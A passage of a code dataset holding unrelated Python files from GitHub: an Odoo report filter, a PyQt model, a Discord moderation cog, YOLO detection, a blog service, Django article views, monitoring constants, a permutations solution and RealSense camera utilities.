options_account_groups\n \"\"\"\n return [group for group in options.get('account_groups', []) if\n group['selected']]\n\n @api.model\n def _get_options_account_groups_domain(self, options):\n \"\"\"\n _get_options_account_groups_domain\n \"\"\"\n selected_account_groups = self._get_options_account_groups(options)\n return selected_account_groups and [\n ('account_id.group_id', 'in',\n [j['id'] for j in selected_account_groups])\n ] or []\n\n @api.model\n def _get_options_domain(self, options):\n \"\"\"\n Override _get_options_domain\n :params options:\n \"\"\"\n domain = super(AccountReport, self)._get_options_domain(options)\n domain += self._get_options_account_groups_domain(options)\n return domain\n\n @api.model\n def _init_filter_analytic(self, options, previous_options=None):\n \"\"\"\n Override _init_filter_analytic\n :param options:\n :param previous_options:\n \"\"\"\n if not self.filter_analytic:\n return\n\n options['analytic'] = self.filter_analytic\n\n if self.user_has_groups('analytic.group_analytic_accounting'):\n options[\n 'analytic_accounts'] = \\\n previous_options and previous_options.get(\n 'analytic_accounts') or []\n analytic_account_ids = [int(acc) for acc in\n options['analytic_accounts']]\n selected_analytic_accounts = \\\n analytic_account_ids and self.env[\n 'account.analytic.account'].browse(analytic_account_ids) \\\n or self.env['account.analytic.account']\n options['selected_analytic_account_names'] = \\\n selected_analytic_accounts.mapped('name')\n # analytic_groups\n options['analytic_groups'] = \\\n previous_options and previous_options.get(\n 'analytic_groups') or []\n analytic_groups_ids = [int(accg) for accg in\n options['analytic_groups']]\n selected_analytic_groups = \\\n analytic_groups_ids and self.env['account.analytic.group']. \\\n browse(analytic_groups_ids) \\\n or self.env['account.analytic.group']\n options['selected_analytic_group_names'] = \\\n selected_analytic_groups.mapped('name')\n if self.user_has_groups('analytic.group_analytic_tags'):\n options[\n 'analytic_tags'] = previous_options and previous_options.get(\n 'analytic_tags') or []\n analytic_tag_ids = [int(tag) for tag in options['analytic_tags']]\n selected_analytic_tags = \\\n analytic_tag_ids and self.env['account.analytic.tag'].browse(\n analytic_tag_ids) or self.env['account.analytic.tag']\n options['selected_analytic_tag_names'] = \\\n selected_analytic_tags.mapped('name')\n\n @api.model\n def _get_options_analytic_domain(self, options):\n \"\"\"\n Override to add domain for analytic_groups\n \"\"\"\n domain = super(AccountReport, self)._get_options_analytic_domain(\n options)\n if options.get('analytic_groups'):\n analytic_group_ids = [int(accg) for accg in\n options['analytic_groups']]\n domain.append(('analytic_account_id.group_id', 'in',\n analytic_group_ids))\n\n return domain\n\n def _set_context(self, options):\n \"\"\"\n Override _set_context\n :params options:\n \"\"\"\n ctx = super(AccountReport, self)._set_context(options)\n if options.get('analytic_groups'):\n ctx['analytic_group_ids'] = self.env['account.analytic.group']. \\\n browse([int(accg) for accg in options['analytic_groups']])\n if options.get('account_groups'):\n account_group_ids = [grp.get('id') for grp in\n options.get('account_groups')\n if grp.get('selected')]\n ctx['account_group_ids'] = self.env['account.group'].browse(\n account_group_ids)\n return ctx\n","repo_name":"Emadbox/careone","sub_path":"account_reports_filters/models/account_report.py","file_name":"account_report.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"28069098940","text":"# Model for the bottom station\nfrom typing import NamedTuple\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtCore import pyqtSignal\n\nclass BottomStaticData(NamedTuple):\n\n height : int\n label_text : str\n label_width : int\n button_text : str\n button_width : int\n label_width : int\n \n @staticmethod\n def default():\n return BottomStaticData(80, 'Content Path:',100, 'Change', 100)\n\n\nclass BottomStationModel(QObject):\n\n contentPathChanged = pyqtSignal(str)\n\n def __init__(self,\n static_data : BottomStaticData = BottomStaticData.default(),\n dynamic_data : str = ''\n ):\n super().__init__()\n self._static_data = static_data\n self._dynamic_data = dynamic_data\n\n @property\n def static_data(self):\n return self._static_data\n\n @property\n def dynamic_data(self):\n return self._dynamic_data\n\n @dynamic_data.setter\n def dynamic_data(self, value:str):\n self._dynamic_data = value\n self.contentPathChanged.emit(value)","repo_name":"Supasiti/problem_manager","sub_path":"models/bottom_model.py","file_name":"bottom_model.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16987226831","text":"#!/usr/bin/env python3.6\nfrom discord.ext import commands\nimport discord\n\nfrom cogs.checks import is_mod, is_server_owner\n\nclass Mod(commands.Cog):\n def __init__(self):\n pass\n\n async def create_mute_role(self, ctx):\n if 'raymond mute' in list(map(lambda r: r.name, ctx.guild.roles)):\n return next((r for r in ctx.guild.roles if r.name == 'raymond mute'), None)\n \n role = await ctx.guild.create_role(name='raymond mute', color=discord.Color(value = 0x522c04))\n\n for channel in ctx.guild.channels:\n overwrite = discord.PermissionOverwrite(send_messages=False)\n\n await channel.set_permissions(role, overwrite=overwrite)\n\n return role\n\n @is_server_owner()\n @commands.command(name='purge')\n async def _purge(self, ctx, limit: int, *, specific_user:discord.Member=None):\n \"\"\"Purges a channel.\n \n If you wish to target one user's messages, **mention** them.\"\"\"\n def check(m):\n if not specific_user:\n return True\n \n return m.author.id == specific_user.id\n \n await ctx.channel.purge(limit=limit, check=check)\n \n @is_mod()\n @commands.command(name='mute')\n async def _mute(self, ctx, *, target:discord.Member):\n \"\"\"Mutes a user.\"\"\"\n mr = await self.create_mute_role(ctx)\n\n await target.add_roles(mr)\n\n await ctx.send(':white_check_mark:')\n\n @is_mod()\n @commands.command(name='unmute')\n async def _unmute(self, ctx, *, target:discord.Member):\n '''Unmutes a user.'''\n mr = next((r for r in ctx.guild.roles if r.name == 'raymond mute'), None)\n\n await target.remove_roles(mr)\n await ctx.send(':ballot_box_with_check:')\n\ndef setup(bot):\n bot.add_cog(Mod())","repo_name":"adx59/raymond","sub_path":"cogs/mod.py","file_name":"mod.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2425197135","text":"import time\nimport cv2\nimport argparse\nimport numpy as np\nfrom urllib.request import urlopen\nimport os.path as path\nfrom urllib.parse import quote\nfrom base64 import b64encode\n\nnames = path.abspath(path.join(__file__ ,\"../../YOLOv3/spydark_yolo.names\"))\nweights = path.abspath(path.join(__file__ ,\"../../YOLOv3/spydark_yolo.weights\"))\ncfg = path.abspath(path.join(__file__ ,\"../../YOLOv3/spydark_yolo.cfg\"))\n\nnet = cv2.dnn.readNet(weights, cfg)\nlayer_names = net.getLayerNames() # returns a list of all layer names (conv,bn,relu,yolo, etc)\noutput_layers = [layer_names[i - 1] for i in net.getUnconnectedOutLayers()] # creates list of yolo layers using indices of yolo layers\n\n\ndef detect_object(fs, filename):\n \n detected = False\n start = time.time()\n\n def draw_prediction(img, class_id, x, y, x_plus_w, y_plus_h):\n label = str(classes[class_id])\n color = (255,0,0)\n cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)\n cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)\n\n try:\n img_bytes = fs.get_last_version(filename=filename).read()\n image = np.asarray(bytearray(img_bytes), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n except Exception:\n print(\"Error in accessing image\")\n return False\n\n width = image.shape[1]\n height = image.shape[0]\n\n # Create a list of all classes in names file\n classes = None\n with open(names, 'r') as f:\n classes = [line.strip() for line in f.readlines()] \n\n blob = cv2.dnn.blobFromImage(image, scalefactor=0.00392, size=(416, 416), mean=(0, 0, 0), swapRB=True, crop=False)\n net.setInput(blob)\n outputs = net.forward(output_layers)\n # outputs contains all information in the image\n\n class_ids = []\n confidences = []\n boxes = []\n\n for output in outputs:\n for detection in output:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.5:\n print(\"Object detected, Confidence:\", confidence)\n detected = True\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n class_ids.append(class_id)\n confidences.append(float(confidence))\n boxes.append([x, y, w, h])\n\n # Applying non-max suppression\n indices = cv2.dnn.NMSBoxes(boxes, confidences, score_threshold=0.5, nms_threshold=0.4) # returns indices of labels that are not suppressed\n\n # Putting bounding boxes and label\n no_objects_detected = len(boxes)\n for i in range(no_objects_detected):\n if i in indices:\n x, y, w, h = boxes[i]\n draw_prediction(image, class_ids[i], round(x), round(y), round(x + w), round(y + h))\n\n cv2.imshow(\"object detection\", image)\n\n end = time.time()\n print(\"YOLO Execution time: \" + str(end-start) + \"\\n\")\n\n cv2.waitKey(2000)\n\n cv2.destroyAllWindows()\n\n return detected","repo_name":"swapneelparanjpe/Spydark","sub_path":"filters/img_detect.py","file_name":"img_detect.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"73585456401","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n@author: delu\n@file: service.py\n@time: 18/9/6 11:50\n\"\"\"\nimport tornado.gen\n\nfrom base.service import ServiceBase\n\n\nclass Service(ServiceBase):\n \"\"\"\n service\n \"\"\"\n\n def __init__(self):\n \"\"\"\n 对象初始化方法\n 添加你需要使用的model\n 格式 项目model文件夹下的文件名或者 包名1.包名2.文件名 (无.py后缀)\n \"\"\"\n pass\n\n @tornado.gen.coroutine\n def create_group(self, params={}):\n \"\"\"\n 创建分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['parent_group_id', 'group_name', 'user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n parent_height_result = yield self.query_group_single({'group_id': params['parent_group_id']})\n\n if parent_height_result['code'] != 0:\n raise self._gr(parent_height_result)\n\n params['height'] = parent_height_result['data'] + 1\n\n result = yield self.do_model('blog.group.model', 'create_group', params)\n\n if not result:\n raise self._gre('SQL_EXECUTE_ERROR')\n\n result['height'] = params['height']\n\n raise self._grs(result)\n\n @tornado.gen.coroutine\n def query_group(self, params):\n \"\"\"\n 查询分组及所有子分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n group_list = yield self.do_model('blog.group.model', 'query_group_list', params)\n\n if not group_list:\n raise self._gre('GROUP_NOT_FOUND')\n\n # 构造一个树\n # 转成group字典\n parent_group_dict = {}\n for group in group_list:\n\n parent_group_id = group['parent_group_id']\n\n if parent_group_id in parent_group_dict:\n\n parent_group_dict[parent_group_id].append(group)\n else:\n parent_group_dict[parent_group_id] = [group]\n\n # 从根节点开始构造整棵树\n root_group_list = self.__build_group_tree_list(-1, parent_group_dict)\n\n raise self._grs(root_group_list)\n\n def __build_group_tree_list(self, parent_group_id, parent_group_dict):\n \"\"\"\n 从group_list中构造一颗树\n :param parent_group_id: \n :param parent_group_dict: \n :return: \n \"\"\"\n final_group_list = []\n\n if parent_group_id not in parent_group_dict:\n return []\n\n child_group_list = parent_group_dict[parent_group_id]\n\n for group in child_group_list:\n group['sub_group_list'] = self.__build_group_tree_list(group['group_id'], parent_group_dict)\n\n final_group_list.append(group)\n\n return final_group_list\n\n @tornado.gen.coroutine\n def update_group(self, params):\n \"\"\"\n 更新分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['group_id', 'group_name', 'user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n result = yield self.do_model('blog.group.model', 'update_group', params)\n\n if not result:\n raise self._gre('SQL_EXECUTE_ERROR')\n\n raise self._grs()\n\n @tornado.gen.coroutine\n def delete_group(self, params):\n \"\"\"\n 删除分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['group_id', 'user_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n group_list = yield self.do_model('blog.group.model', 'query_group_list', params)\n\n if not group_list:\n raise self._gre('GROUP_NOT_FOUND')\n\n # 构造一个树\n # 转成group字典\n parent_group_dict = {}\n for group in group_list:\n\n parent_group_id = group['parent_group_id']\n\n if parent_group_id in parent_group_dict:\n\n parent_group_dict[parent_group_id].append(group)\n else:\n parent_group_dict[parent_group_id] = [group]\n\n root_group_list = self.__build_group_tree_list(int(params['group_id']), parent_group_dict)\n\n final_group_list = self.__tree_parse_list(root_group_list)\n\n group_id_list = [group['group_id'] for group in final_group_list]\n\n group_id_list.append(params['group_id'])\n\n result = yield self.do_model(\n 'blog.group.model',\n 'delete_group',\n {\n 'group_id_list': group_id_list,\n 'user_id': params['user_id']\n })\n\n raise self._grs(result)\n\n def __tree_parse_list(self, group_list):\n \"\"\"\n 将树形结构转换成列表结构\n :param group_list: \n :return: \n \"\"\"\n final_group_list = []\n\n for group in group_list:\n\n final_group_list.append(group)\n\n final_group_list.extend(self.__tree_parse_list(group['sub_group_list']))\n\n return final_group_list\n\n @tornado.gen.coroutine\n def query_group_single(self, params):\n \"\"\"\n 查询单个分组\n :param params: \n :return: \n \"\"\"\n if self.common_utils.is_empty(['group_id'], params):\n raise self._gre('PARAMS_NOT_EXIST')\n\n group_result = yield self.do_model('blog.group.model', 'query_group_single', params)\n\n if group_result is False:\n raise self._grs('')\n\n height = 0\n\n if group_result:\n\n height = group_result['height']\n\n raise self._grs(height)\n","repo_name":"deluhorse/blog-python-","sub_path":"v3/module/blog/group/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5081450993","text":"from typing import List\n\n# Runtime: 79 ms, faster than 5.45% of Python3 online submissions for Subsets.\n# Memory Usage: 14.4 MB, less than 79.30% of Python3 online submissions for Subsets.\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n ans = []\n nums.sort()\n start = nums[0]-1\n prev_nums = []\n\n def dfs(nums, start):\n for num in nums:\n if num > start:\n prev_nums.append(num)\n ans.append(prev_nums[:])\n start = num\n dfs(nums, start)\n prev_nums.pop()\n dfs(nums, start)\n ans.append([])\n return ans\n","repo_name":"huckjoo/swjungle_alg","sub_path":"leetcode/78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19857612920","text":"from django.shortcuts import render, redirect\nfrom .models import ArticlePost\nimport markdown\nfrom django.http import HttpResponse\n\nfrom django.http import HttpResponse\nfrom .forms import ArticlePostForm\nfrom django.contrib.auth.models import User\n\ndef article_list(request):\n articles = ArticlePost.objects.all()\n context = {'articles': articles}\n return render(request, 'article/list.html', context)\n\ndef article_detail(request, id):\n article = ArticlePost.objects.get(id=id)\n article.body = markdown.markdown(article.body,\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n ])\n context = {'article': article}\n return render(request, 'article/detail.html', context)\n\n\ndef article_create(request):\n if request.method == \"POST\":\n # 将提交的数据赋值到表单示例中\n article_post_form = ArticlePostForm(data=request.POST)\n # 判断提交的数据是否满足模型要求\n if article_post_form.is_valid():\n # 保存数据,暂时不提交到数据库中\n new_article = article_post_form.save(commit=False)\n # 指定数据库中id=1的用户作为作者\n # 如果你进行过删除数据表的操作,可能会找不到id=1的用户\n # 此时请重新创建用户,并传入此用户的ID\n new_article.author = User.objects.get(id=1)\n # 将文章保存到数据库中\n new_article.save()\n # 完成后返回文章列表\n return redirect(\"article:article_list\")\n else:\n return HttpResponse(\"表单内容有误,请重新填写\")\n else:\n # 创建表单类示例\n article_post_form = ArticlePostForm()\n context = {'article_post_form': article_post_form}\n return render(request, 'article/create.html', context)\n\ndef article_delete(request,id):\n # 根据id获取需要删除的文章\n article = ArticlePost.objects.get(id=id)\n # 调用delete方法删除文章\n article.delete()\n # 完成删除后返回文章列表\n return redirect(\"article:article_list\")\n\n# 安全删除文章\ndef article_safe_delete(request, id):\n if request.method == 'POST':\n article = ArticlePost.objects.get(id=id)\n article.delete()\n return redirect(\"article:article_list\")\n else:\n return HttpResponse(\"仅允许post请求\")\n\ndef article_update(request, id):\n \"\"\"\n 更新文章视图函数\n 通过post方式提交表单,更新title,body字段\n GET方法进入初识话表单页面\n id: 文章的Id\n \"\"\"\n #获取需要修改为的文章对象\n article = ArticlePost.objects.get(id=id)\n # 判断是否使用post方式提交表单\n if request.method == \"POST\":\n # 将提交的数据赋值到表单示例\n article_post_form = ArticlePostForm(data=request.POST)\n # 判断提交的数据是否满足模型要求\n if article_post_form.is_valid():\n # 保存新写入的title、body 数据并保存\n article.title = request.POST['title']\n article.body = request.POST['body']\n article.save()\n # 完成购返回修改后的文章中,需传入文章ID\n return redirect(\"article:article_detail\", id=id)\n # 如果这个数据不合法,返回错误信息\n else:\n return HttpResponse(\"表单内容有误,请重新填写。\")\n # 如果用户GET请求获取数据\n else:\n # 创建表单类示例\n article_post_form = ArticlePostForm()\n # 赋值上下文,将article文章对象也传递进去,以便的内容\n context = {'article': article, 'article_post_form': article_post_form}\n # 将响应返回到模板中\n return render(request, 'article/update.html', context)","repo_name":"TrellixVulnTeam/jdango-blog_OM48","sub_path":"blog/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30544609012","text":"FEATURE_NAME_COLUMN = 'feature_name'\nGROUP_COLUMN = 'group'\nGROUP_PIVOT_COLUMN = 'group_pivot'\nFEATURE_CATEGORY_COLUMN = 'data_type'\nMETRIC_NAME_COLUMN = 'metric_name'\nMETRIC_VALUE_COLUMN = 'metric_value'\n\n# Column Names of Histogram\nBUCKET_COUNT_COLUMN = 'bucket_count'\nCATEGORY_BUCKET_COLUMN = 'category_bucket'\nFEATURE_BUCKET_COLUMN = 'feature_bucket'\nFEATURE_TYPE_COLUMN = 'feature_type'\nLOWER_BOUND_COLUMN = 'lower_bound'\nUPPER_BOUND_COLUMN = 'upper_bound'\n\n# Error Messages\nMESSAGE_TO_CONTACT_AML = 'Please contact Microsoft support for assistance.'\n\n# Filenames\nMETA_FILENAME = '.meta'\nMETRICS_FILENAME = 'metrics.json'\n\n# Others\nCATEGORICAL_FEATURE_CATEGORY = 'categorical'\nNUMERICAL_FEATURE_CATEGORY = 'numerical'\nUTF8_ENCODING = 'utf-8'\n\n# Parameters for Outputs of Output Metrics Component\nBASELINE_COUNT_PARAM = 'baselineCount'\nCATEGORICAL_PARAM = 'categorical'\nCATEGORY_PARAM = 'category'\nFEATURE_CATEGORY_PARAM = 'featureCategory'\nFEATURE_FILES_PARAM = 'featureFiles'\nFEATURE_NAME_PARAM = 'featureName'\nHISTOGRAM_PARAM = 'histogram'\nLOWER_BOUND_PARAM = 'lowerBound'\nMETRIC_VALUE_PARAM = 'metricValue'\nMETRICS_FILE_PARAM = 'metricsFile'\nMETRICS_PARAM = 'metrics'\nMETRICS_TYPE_PARAM = 'metricsType'\nNUMERICAL_PARAM = 'numerical'\nTARGET_COUNT_PARAM = 'targetCount'\nUPPER_BOUND_PARAM = 'upperBound'\nVERSION_PARAM = 'version'\n\n# Values for Outputs of Output Metrics Component\nMETADATA_VERSION = '1.0.0'\n\n# Model types\nCLASSIFICATION = 'classification'\nREGRESSION = 'regression'\n\n# Column names/values for feature attribution drift and feature importance\nFEATURE_COLUMN = 'feature'\nROW_COUNT_COLUMN_NAME = 'RowCount'\nTHRESHOLD_VALUE = 'threshold_value'\n","repo_name":"raoxiang1996/azureml-assets","sub_path":"assets/model_monitoring/components/src/shared_utilities/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"7495787866","text":"import math\nfrom typing import List\n\n\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n result = []\n used = set()\n\n def dfs(memo: List[int]) -> None:\n if len(memo) == len(nums):\n result.append(list(memo))\n return\n\n for i, num in enumerate(nums):\n if i in used:\n continue\n\n curr = num\n used.add(i)\n memo.append(curr)\n dfs(memo)\n memo.pop()\n used.remove(i)\n\n dfs([])\n return result\n\n\n\"\"\"\nExplanation:\n\nInitialize result array to store final permutations and used set to store visited elements. Create a function called dfs which takes memo as input. If the size of memo is equal to the length of nums, push the current permutation to result. For each number in nums, if it's not already in used, add it to memo and used, call the dfs function with the updated memo, and then remove it from memo and used to backtrack. The final result will contain all the permutations.\n\nNotes:\n\nTime Complexity: O(n! * n), since we create a copy of the current permutation every time we find a valid permutation. Since the length of the permutation is n, creating a copy takes O(n) time, and we do this for each of the n! permutations, resulting in a total time complexity of O(n! * n).\n\nSpace Complexity: O(n! * n), since we create a new list of length n for each permutation, and there are n! possible permutations. Therefore, the total space required is n! * n. Additionally, we use a set to store the indices of used elements, which requires at most O(n) space. Overall, the space complexity is O(n! * n + n), which simplifies to O(n! * n).\n\"\"\"\n\n# Test 1: Single element\nnums = [1]\nresult = Solution().permute(nums)\nresult_len = len(result) == len(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert result_len, f\"Expected same_outer_len to equal True but got {result_len}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n\n# Test 2: Two elements\nnums = [1, 2]\nresult = Solution().permute(nums)\nresult_len = len(result) == len(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert result_len, f\"Expected same_outer_len to equal True but got {result_len}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n\n# Test 2: Greater than two elements\nnums = [1, 2, 3]\nresult = Solution().permute(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert len(result) == math.factorial(\n len(nums)), f\"Expected 6 but got {len(result)}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n\n# Test 3: Max elements\nnums = [1, 2, 3, 4, 5, 6]\nresult = Solution().permute(nums)\nsame_inner_len = all(len(p) == len(nums) for p in result)\nunique_inner_nums = all(set(p) == set(nums) for p in result)\nassert len(result) == math.factorial(\n len(nums)), f\"Expected 720 but got {len(result)}\"\nassert same_inner_len, f\"Expected same_inner_len to equal True but got {same_inner_len}\"\nassert unique_inner_nums, f\"Expected unique_inner_nums to equal True but got {unique_inner_nums}\"\n","repo_name":"garofalof/algopractice_python","sub_path":"medium/46_Permutations.py","file_name":"46_Permutations.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41734675451","text":"'''\n\t[문제] \n\t\t철수는 일정한 빠르기로 운동장을 도는데 4바퀴에 56분이 걸린다. \n\t\t민수는 일정한 빠르기로 운동장을 도는데 7바퀴에 1시간 24분이 걸린다. \t\n\t\t철수와 민수가 똑같이 3바퀴를 돈다면 그 차이는 몇 분 인지 구하시오.\n\t\t\n\t[정답] \n\t\t6 또는 -6\n'''\nchulsu_time = 56\nchulsu = chulsu_time // 4\nminsu_time = 84\nminsu = minsu_time // 7\n\nanswer1 = (chulsu*3) - (minsu*3)\nanswer2 = (minsu*3) - (chulsu*3)\nprint(answer1,\"분\",\"또는\",answer2,\"분\")\n","repo_name":"wisline97/keduit_frontend","sub_path":"02_python/수업자료/수업시간 내 진행/C변수/변수4_문제/변수4_문제_달리기속도_문제.py","file_name":"변수4_문제_달리기속도_문제.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36053535260","text":"import os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pyrealsense2 as rs\n# from realsense_camera import *\nimport pepper_fruit_utils, pepper_utils\nfrom PIL import Image\n\ndef get_img_size(img_path):\n img = read_image(img_path)\n return img.shape\n\n\ndef get_all_image_path_in_folder(path):\n # print(\"I am at\", os.getcwd())\n # print('I want ', os.getcwd()+path)\n img_list = list()\n for dirs, subdir, files in os.walk(os.getcwd()+path):\n for file_name in files:\n if file_name.endswith(\".jpeg\") or file_name.endswith(\".jpg\") or file_name.endswith(\".png\"):\n rgb_file = dirs + os.sep + file_name\n img_list.append(rgb_file)\n # print(\"all images in folder: \", img_list)\n return img_list[:]\n\n\ndef read_image(img_path):\n img = cv2.imread(img_path)\n img = np.asarray(img)\n return img\n\n\ndef put_title(detected_frame):\n # displaying the title\n plt.title(\n label=f\"Pepper: {len(detected_frame.pepper_fruit_detections)} Peduncle: {len(detected_frame.pepper_peduncle_detections)}\",\n fontsize=10,\n color=\"black\")\n \n\ndef get_image_from_webcam():\n camera = cv2.VideoCapture(0)\n # camera = cv2.VideoCapture(0)\n # 4: dotted camera\n # 6: rgb camera\n while True:\n return_value, image = camera.read()\n # gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n image = cv2.flip(image, 1) # <class 'numpy.ndarray'>\n cv2.imshow('image', image)\n k = cv2.waitKey(0)\n if k==27:\n print(\"hey\")\n camera.release()\n cv2.destroyAllWindows()\n return image\n # break\n camera.release()\n cv2.destroyAllWindows()\n return image\n\ndef get_image_from_realsense():\n # Configure depth and color streams\n pipeline = rs.pipeline()\n config = rs.config()\n\n # Get device product line for setting a supporting resolution\n pipeline_wrapper = rs.pipeline_wrapper(pipeline)\n pipeline_profile = config.resolve(pipeline_wrapper)\n device = pipeline_profile.get_device()\n device_product_line = str(device.get_info(rs.camera_info.product_line))\n\n found_rgb = False\n for s in device.sensors:\n if s.get_info(rs.camera_info.name) == 'RGB Camera':\n found_rgb = True\n break\n if not found_rgb:\n print(\"The demo requires Depth camera with Color sensor\")\n exit(0)\n\n config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\n if device_product_line == 'L500':\n config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\n else:\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\n # Start streaming\n pipeline.start(config)\n\n try:\n while True:\n\n # Wait for a coherent pair of frames: depth and color\n frames = pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue\n\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_frame.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n # Apply colormap on depth image (image must be converted to 8-bit per pixel first)\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n\n depth_colormap_dim = depth_colormap.shape\n color_colormap_dim = color_image.shape\n\n # If depth and color resolutions are different, resize color image to match depth image for display\n if depth_colormap_dim != color_colormap_dim:\n resized_color_image = cv2.resize(color_image, dsize=(depth_colormap_dim[1], depth_colormap_dim[0]), interpolation=cv2.INTER_AREA)\n images = np.hstack((resized_color_image, depth_colormap))\n else:\n images = np.hstack((color_image, depth_colormap))\n\n # Show images\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', images)\n \n k = cv2.waitKey(0)\n if k==27:\n print(\"hey\")\n cv2.destroyAllWindows()\n print(\"images\", images.shape)\n return images[:, :640, :]\n # break\n\n finally:\n\n # Stop streaming\n pipeline.stop()\n\n return resized_color_image\n\n\ndef red_to_green(img):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n red_lo = np.array([50, 0, 0])\n red_hi = np.array([255, 255, 255])\n # Mask image to only select browns\n mask = cv2.inRange(hsv, red_lo, red_hi)\n cv2.imwrite(\"mask.jpg\", mask)\n # img[mask > 0] = img[mask > 0] * [0.3, 0, 0] + [0, 130, 0]\n img[mask > 0] = 0\n return img\n\n\ndef red_to_green_2(img):\n b, g, r = cv2.split(img) # get b,g,r\n rgb_img = cv2.merge([r, g, b])\n # plt.imshow(rgb_img)\n\n x, y, z = np.shape(img)\n red = np.zeros((x, y, z), dtype=int)\n green = np.zeros((x, y, z), dtype=int)\n blue = np.zeros((x, y, z), dtype=int)\n for i in range(0, x):\n for j in range(0, y):\n red[i][j][0] = rgb_img[i][j][0]\n green[i][j][1] = rgb_img[i][j][1]\n blue[i][j][2] = rgb_img[i][j][2]\n # plt.imshow(red)\n # # plt.show()\n # plt.imshow(green)\n # # plt.show()\n # plt.imshow(blue)\n # plt.show()\n\n retrack_original = np.zeros((x, y, z), dtype=int)\n for i in range(0, x):\n for j in range(0, y):\n retrack_original[i][j][0] = red[i][j][0] * 0.2 // 1\n retrack_original[i][j][1] = green[i][j][1]\n retrack_original[i][j][2] = blue[i][j][2]\n # cv2.imwrite('ori.jpg', retrack_original)\n plt.imshow(retrack_original)\n plt.show()\n return retrack_original\n\nif __name__==\"__main__\":\n # img = get_image_from_webcam()\n img = get_image_from_realsense()\n cv2.imwrite('he.png', img)\n # plt.imshow(img)\n # plt.imsave(img, \"hi.png\")\n\n # First import the library\n # import pyrealsense2 as rs\n\n # # Create a context object. This object owns the handles to all connected realsense devices\n # pipeline = rs.pipeline()\n # pipeline.start()\n\n # try:\n # while True:\n # # Create a pipeline object. This object configures the streaming camera and owns it's handle\n # frames = pipeline.wait_for_frames()\n # depth = frames.get_depth_frame()\n # if not depth: continue\n\n # # Print a simple text-based representation of the image, by breaking it into 10x20 pixel regions and approximating the coverage of pixels within one meter\n # coverage = [0]*64\n # for y in range(480):\n # for x in range(640):\n # dist = depth.get_distance(x, y)\n # if 0 < dist and dist < 